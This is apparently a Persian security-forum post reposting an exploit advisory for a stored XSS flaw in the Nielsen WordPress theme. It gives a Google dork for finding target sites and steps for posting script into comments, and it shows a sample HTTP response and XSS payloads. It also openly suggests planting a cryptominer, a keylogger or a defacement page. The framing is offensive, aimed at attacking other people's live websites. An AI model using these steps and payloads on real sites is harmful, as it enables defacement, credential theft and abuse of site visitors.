discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

https://cxsecurity.com/issue/WLB-2018040113
##################################################
# Title : Nielsen Wordpress Theme Xss Stored Exploit
# Date : 14 April 2018
# Author : GIST
# Version : 1.4.1
# Google Dork : inurl:/wp-content/themes/nielsen
# Youtube : 
# Tested on : Ubuntu
# Vendor : https://themeforest.net/item/nielsen-ecommerce-wordpress-theme/9710159
##################################################

Description : 

Nielsen is a truly user-oriented e-commerce theme,
with a multiconcept layout and a lot of advanced features to enhance your shop.
There are more than 4.000 website that installed this theme.
You Can Put Your Javascripts Code and Run it on website
or you can Inject Your scripts (Miner or Keylogger)

Xss : 

 First Open Enter Google Dork And open Your target.
  
 then open an post and go to Comments section
 
 Then Put your script and post it.
 
 Request Method : Post
 
 -- response --

HTTP/1.1 200OK
Server nginx/1.4.6 (Ubuntu)
Date: Thu, 10 mar 2016 19:18:47 GMT
Content-Type: text/html
Transfer-Encoding: Chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:51:00 GMT
Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragme: no-cache
Content-encoing: gzip

commands : <script>alert('Xss')</script>    or    "><script>alert('Xss')</script>   or Enter Your Deface Page Source

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری